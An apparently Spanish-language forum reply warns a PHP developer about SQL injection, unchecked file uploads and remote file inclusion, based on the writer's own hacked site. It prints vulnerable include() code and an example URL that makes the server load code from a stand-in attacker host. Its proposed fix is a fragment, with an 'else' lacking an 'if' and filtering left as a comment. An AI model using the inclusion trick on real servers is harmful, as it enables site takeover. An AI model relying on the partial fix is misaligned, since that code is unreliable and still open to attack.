Bueno, hay muchos metodos de hackeo XD
- El de injecsion SQL.. (ya lo deves saber :p)
- El de subir archivos... si no verificas bien los datos que el usuario sube, te pueden meter algun virus o un archivo .php y lo ejecutan xD
- El del get (o modulos)... a mi me hackearon 2 veses por ese metodo, mira te explico. Si haces asi para tus modulos (como solia hacer yo):
Código PHP:
Ver original$id=$_GET['id'];
include("{$id}.php");
entonces, alguien hizo: index.php?id=http://www.web_que_ataca.com/archivo_para_infectar
y se va a ejecutar en mi servidor. Asi me infectaron todos mis archivos XD
por ese es bueno poner asi:
Código PHP:
Ver original$id=$_GET['id']; // Algunos filtros aqui....
include("./modulos/{$id}.php");
else
die('El modulo no existe!..');
y otra cosa... no uses $_GET[ALGO AQUI] o $_POST[ALGO AQUI]... si no gurdalas en una variable y filtradas.
Despues deven aver otro metodos de hackeo, pero no conosco :p
Suerte
Salu2
